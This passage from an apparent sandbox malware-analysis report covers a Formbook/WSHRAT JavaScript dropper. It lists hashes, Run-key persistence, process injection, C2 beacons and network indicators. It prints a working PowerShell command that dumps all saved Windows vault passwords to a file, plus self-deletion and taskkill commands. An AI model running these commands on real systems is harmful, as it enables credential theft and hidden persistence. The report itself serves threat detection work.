Country is the GeoIP of the destination. In the original capture the 26 connections to 154.127.53.102:7121 are interleaved with every other lookup from start to finish: a periodic beacon to a raw IP on a non-standard port, which is the easiest of these indicators to block at the egress. The www.* domains are each resolved once, in sequence, and three produced no connection; working through a list of unrelated-looking domains one after another is consistent with Formbook's documented habit of cycling through its embedded C2 candidates, though the report does not show which of them, if any, answered as a C2. astatech-cn.com and wshsoft.company are reached over plain HTTP, and ip-api.com is the external IP lookup flagged above. The report does not record which destination received the WSHRAT User-Agent requests.

Files

C:\Users\Admin\AppData\Roaming\Scan0035.js

MD5 ad65c8c29d312119ad339adc8b699025
SHA1 4c04e6c3a2d0ecd059265fba70356277723dd12b
SHA256 9721db64a4674e5b1a6285114ffa9894f34a638dc827a2ca2972c91cc54f63d9
SHA512 0d967d7beb9c8fa8ff806678fcdd241ea0600bcd4a7399fa640d49d823036dc00b59697dffc801aa4369c12760c79e4e8ed6ae141e9e26371dc2608cbdfa709d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan0035.js

MD5 ad65c8c29d312119ad339adc8b699025
SHA1 4c04e6c3a2d0ecd059265fba70356277723dd12b
SHA256 9721db64a4674e5b1a6285114ffa9894f34a638dc827a2ca2972c91cc54f63d9
SHA512 0d967d7beb9c8fa8ff806678fcdd241ea0600bcd4a7399fa640d49d823036dc00b59697dffc801aa4369c12760c79e4e8ed6ae141e9e26371dc2608cbdfa709d

C:\Users\Admin\AppData\Roaming\bin.exe

MD5 61a9ea670e5ace0c0b4713de4a5ee617
SHA1 1f74d817f245c136ea1960be91da994414d7d50d
SHA256 9111d77c08078d5af636aa2e765bce0891704acdd1fd0a325605e0aaf42d4d97
SHA512 88348c23255de8214fe636ec0c0d97be12f36c5ec5437ea8096b171d86b3b8a5b0f1cc56798f568b01345584bc3c49f6b42d75b75694ec601484b2e10941ad7b

memory/1040-58-0x000000000097F000-0x0000000000980000-memory.dmp

memory/1040-57-0x0000000000B20000-0x0000000000E23000-memory.dmp

memory/1040-59-0x0000000000130000-0x0000000000144000-memory.dmp

memory/1200-60-0x0000000004D50000-0x0000000004E1C000-memory.dmp

memory/1140-61-0x0000000075B51000-0x0000000075B53000-memory.dmp

memory/1140-63-0x0000000000C20000-0x0000000000D24000-memory.dmp

memory/1140-64-0x0000000000080000-0x00000000000AF000-memory.dmp

memory/1140-65-0x0000000002130000-0x0000000002433000-memory.dmp

memory/1140-66-0x0000000000650000-0x00000000006E3000-memory.dmp

memory/1200-67-0x0000000008080000-0x00000000081F0000-memory.dmp

memory/1548-68-0x000007FEFB9C1000-0x000007FEFB9C3000-memory.dmp

memory/1548-70-0x000007FEF4DFE000-0x000007FEF4DFF000-memory.dmp

memory/1548-71-0x00000000025B0000-0x00000000025B2000-memory.dmp

memory/1548-72-0x00000000025B2000-0x00000000025B4000-memory.dmp

memory/1548-73-0x00000000025B4000-0x00000000025B7000-memory.dmp

memory/1548-69-0x000007FEF26D0000-0x000007FEF322D000-memory.dmp

memory/1548-74-0x00000000025BB000-0x00000000025DA000-memory.dmp

C:\Users\Admin\AppData\Roaming\cmdc.exe

MD5 54e8ded7b148a13d3363ac7b33f6eb06
SHA1 63dcbe2db9cc14564eb84d5e953f2f9f5c54acd9
SHA256 400b411a9bffd687c5e74f51d43b7dc92cdb8d5ca9f674456b75a5d37587d342
SHA512 bf6d047bb55150b2369bdd7dfea9c815894af2e05e5b45f2eedf67d5d6a9569189ee495870fddf334a173a4beed62d2a08807c000d4c47339ac76b760b4ae349

C:\Users\Admin\AppData\Roaming\cmdc.cfg

MD5 70e69155b8080b5db35191ab8426d084
SHA1 383deaaee90ce71b28b0a6e22124e77aa1cccf8b
SHA256 104e0212403148a018258ef005a64ec73f0a148dbee230cb5c91dd691d03aefe
SHA512 c718c69454e4d9bcac24c918bf4c7f05ab93910b8a4701bd1dc914a9ca13dffe5f083f30881b5796d239c11be2f8b3e38a7e2ac7dcabc3d9810f59d9228bf342

Analysis: behavioral2

Detonation Overview

Submitted

2022-02-16 23:02

Reported

2022-02-16 23:05

Platform

win10v2004-en-20220113

Max time kernel

167s

Max time network

179s

Command Line

C:\Windows\Explorer.EXE

Signatures

Formbook

trojan spyware stealer formbook

WSHRAT

trojan wshrat

Formbook Payload

rat
Description | Indicator | Process | Target
3 matches, no description, indicator, process or target recorded

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\bin.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\wscript.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A

Geo\Nation holds the country configured for the user; both wscript.exe instances read it, and it is the likely source of the NL:Netherlands field in the WSHRAT User-Agent below.

Drops startup file

Description | Indicator | Process | Target
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan0035.js | C:\Windows\system32\wscript.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan0035.js | C:\Windows\System32\wscript.exe | N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\software\microsoft\windows\currentversion\run | C:\Windows\System32\wscript.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scan0035 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Scan0035.js\"" | C:\Windows\System32\wscript.exe | N/A
Key created | \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run | C:\Windows\System32\wscript.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scan0035 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Scan0035.js\"" | C:\Windows\System32\wscript.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scan0035 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Scan0035.js\"" | C:\Windows\system32\wscript.exe | N/A
Key created | \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scan0035 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Scan0035.js\"" | C:\Windows\system32\wscript.exe | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | ip-api.com | N/A | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 1440 set thread context of 3028 | N/A | C:\Users\Admin\AppData\Roaming\bin.exe | C:\Windows\Explorer.EXE
PID 3652 set thread context of 3028 | N/A | C:\Windows\SysWOW64\NETSTAT.EXE | C:\Windows\Explorer.EXE

Drops file in Windows directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log | C:\Windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\SoftwareDistribution\DataStore\DataStore.edb | C:\Windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm | C:\Windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\SoftwareDistribution\ReportingEvents.log | C:\Windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\Logs\CBS\CBS.log | C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe | N/A
File opened for modification | C:\Windows\WinSxS\pending.xml | C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe | N/A
File opened for modification | C:\Windows\WindowsUpdate.log | C:\Windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk | C:\Windows\system32\svchost.exe | N/A

Every writer here is a Windows Update or servicing-stack component (svchost.exe, TiWorker.exe) touching its own database and logs. This is background activity of the Windows 10 VM, not behaviour of the sample, and should not be read as the malware dropping files into the Windows directory.

Enumerates physical storage devices

Gathers network information

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\NETSTAT.EXE | N/A

Kills process with taskkill

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A

Script User-Agent

Description: HTTP User-Agent header (Process and Target: N/A for every row)

21 requests: WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands
2 requests: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Same beacon format as in behavioral1; the machine id, computer name and OS fields differ because this is a different VM.

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target | Hits
N/A | N/A | C:\Users\Admin\AppData\Roaming\bin.exe | N/A | 4
N/A | N/A | C:\Windows\SysWOW64\NETSTAT.EXE | N/A | 43
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 2
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bin.exe N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\bin.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1536 wrote to memory of 680 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\wscript.exe
PID 1536 wrote to memory of 680 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\wscript.exe
PID 680 wrote to memory of 1440 N/A C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Roaming\bin.exe
PID 680 wrote to memory of 1440 N/A C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Roaming\bin.exe
PID 680 wrote to memory of 1440 N/A C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Roaming\bin.exe
PID 3028 wrote to memory of 3652 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\NETSTAT.EXE
PID 3028 wrote to memory of 3652 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\NETSTAT.EXE
PID 3028 wrote to memory of 3652 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\NETSTAT.EXE
PID 3652 wrote to memory of 3544 N/A C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\cmd.exe
PID 3652 wrote to memory of 3544 N/A C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\cmd.exe
PID 3652 wrote to memory of 3544 N/A C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\cmd.exe
PID 680 wrote to memory of 3740 N/A C:\Windows\System32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 680 wrote to memory of 3740 N/A C:\Windows\System32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 680 wrote to memory of 216 N/A C:\Windows\System32\wscript.exe C:\Windows\system32\cmd.exe
PID 680 wrote to memory of 216 N/A C:\Windows\System32\wscript.exe C:\Windows\system32\cmd.exe
PID 216 wrote to memory of 900 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 216 wrote to memory of 900 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\Scan0035.js

C:\Windows\System32\wscript.exe

"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\Scan0035.js"

C:\Users\Admin\AppData\Roaming\bin.exe

"C:\Users\Admin\AppData\Roaming\bin.exe"

C:\Windows\SysWOW64\NETSTAT.EXE

"C:\Windows\SysWOW64\NETSTAT.EXE"

C:\Windows\SysWOW64\cmd.exe

/c del "C:\Users\Admin\AppData\Roaming\bin.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM cmdc.exe

Network

Country Destination Domain Proto
US 209.197.3.8:80 tcp
US 162.0.215.15:443 tcp
US 20.42.72.131:443 tcp
US 34.104.35.123:80 tcp
NL 88.221.144.170:80 tcp
NL 88.221.144.170:80 tcp
US 8.8.8.8:53 astatech-cn.com udp
GB 78.110.166.82:80 astatech-cn.com tcp
NL 142.250.179.173:443 tcp
NL 142.250.179.206:443 tcp
NL 142.251.36.3:443 tcp
GB 78.110.166.82:80 astatech-cn.com tcp
US 8.8.8.8:443 tcp
NL 142.250.179.131:443 tcp
NL 172.217.168.193:443 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 154.127.53.102:7121 154.127.53.102 tcp
NL 142.250.179.138:443 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 8.8.8.8:53 wshsoft.company udp
SG 194.59.164.67:80 wshsoft.company tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 8.8.8.8:53 www.qube.site udp
DE 52.58.78.16:80 www.qube.site tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 8.8.8.8:443 tcp
NL 142.251.36.3:443 tcp
US 8.8.8.8:53 www.solutionsoutlet.net udp
CA 23.227.38.74:80 www.solutionsoutlet.net tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 8.8.8.8:53 www.cafedetime.com udp
US 156.67.73.64:80 www.cafedetime.com tcp
US 154.127.53.102:7121 154.127.53.102 tcp
NL 142.250.179.195:443 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 8.8.8.8:53 www.soy-salud.com udp
US 34.102.136.180:80 www.soy-salud.com tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 8.8.8.8:53 www.ecoracing.tech udp
US 199.59.243.200:80 www.ecoracing.tech tcp

Files

C:\Users\Admin\AppData\Roaming\Scan0035.js

MD5 ad65c8c29d312119ad339adc8b699025
SHA1 4c04e6c3a2d0ecd059265fba70356277723dd12b
SHA256 9721db64a4674e5b1a6285114ffa9894f34a638dc827a2ca2972c91cc54f63d9
SHA512 0d967d7beb9c8fa8ff806678fcdd241ea0600bcd4a7399fa640d49d823036dc00b59697dffc801aa4369c12760c79e4e8ed6ae141e9e26371dc2608cbdfa709d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan0035.js

MD5 ad65c8c29d312119ad339adc8b699025
SHA1 4c04e6c3a2d0ecd059265fba70356277723dd12b
SHA256 9721db64a4674e5b1a6285114ffa9894f34a638dc827a2ca2972c91cc54f63d9
SHA512 0d967d7beb9c8fa8ff806678fcdd241ea0600bcd4a7399fa640d49d823036dc00b59697dffc801aa4369c12760c79e4e8ed6ae141e9e26371dc2608cbdfa709d

C:\Users\Admin\AppData\Roaming\bin.exe

MD5 61a9ea670e5ace0c0b4713de4a5ee617
SHA1 1f74d817f245c136ea1960be91da994414d7d50d
SHA256 9111d77c08078d5af636aa2e765bce0891704acdd1fd0a325605e0aaf42d4d97
SHA512 88348c23255de8214fe636ec0c0d97be12f36c5ec5437ea8096b171d86b3b8a5b0f1cc56798f568b01345584bc3c49f6b42d75b75694ec601484b2e10941ad7b

C:\Users\Admin\AppData\Roaming\bin.exe

MD5 61a9ea670e5ace0c0b4713de4a5ee617
SHA1 1f74d817f245c136ea1960be91da994414d7d50d
SHA256 9111d77c08078d5af636aa2e765bce0891704acdd1fd0a325605e0aaf42d4d97
SHA512 88348c23255de8214fe636ec0c0d97be12f36c5ec5437ea8096b171d86b3b8a5b0f1cc56798f568b01345584bc3c49f6b42d75b75694ec601484b2e10941ad7b

memory/1440-134-0x00000000011D0000-0x000000000151A000-memory.dmp

memory/1440-135-0x00000000005DF000-0x00000000005E0000-memory.dmp

memory/1440-136-0x0000000000CE0000-0x0000000000CF4000-memory.dmp

memory/3028-137-0x00000000080B0000-0x00000000081E0000-memory.dmp

memory/3652-138-0x00000000009C0000-0x00000000009CB000-memory.dmp

memory/3652-139-0x0000000001110000-0x000000000145A000-memory.dmp

memory/3652-140-0x0000000000700000-0x000000000072F000-memory.dmp

memory/3028-142-0x00000000081E0000-0x0000000008307000-memory.dmp

memory/3652-141-0x0000000000CF0000-0x0000000000D83000-memory.dmp

memory/4984-143-0x000001551E580000-0x000001551E590000-memory.dmp

memory/4984-144-0x000001551EC20000-0x000001551EC30000-memory.dmp

memory/4984-145-0x0000015521300000-0x0000015521304000-memory.dmp

memory/3740-146-0x00007FFBF5743000-0x00007FFBF5745000-memory.dmp

memory/3740-147-0x0000025B3DEE0000-0x0000025B3DEE2000-memory.dmp

memory/3740-148-0x0000025B3DEE3000-0x0000025B3DEE5000-memory.dmp

memory/3740-149-0x0000025B3DEA0000-0x0000025B3DEC2000-memory.dmp

memory/3740-150-0x0000025B3DED0000-0x0000025B3DEDA000-memory.dmp

memory/3740-151-0x0000025B3DEE6000-0x0000025B3DEE8000-memory.dmp

memory/3740-152-0x0000025B3E1F0000-0x0000025B3E1F8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 c416c12d1b2b1da8c8655e393b544362
SHA1 fb1a43cd8e1c556c2d25f361f42a21293c29e447
SHA256 0600d59103840dff210778179fdfba904dcb737a4bfdb35384608698c86ea046
SHA512 cb6d3636be4330aa2fd577c3636d0b7165f92ee817e98f21180ba0c918eb76f4e38f025086593a0e508234ca981cfec2c53482b0e9cc0acfa885fefbdf89913c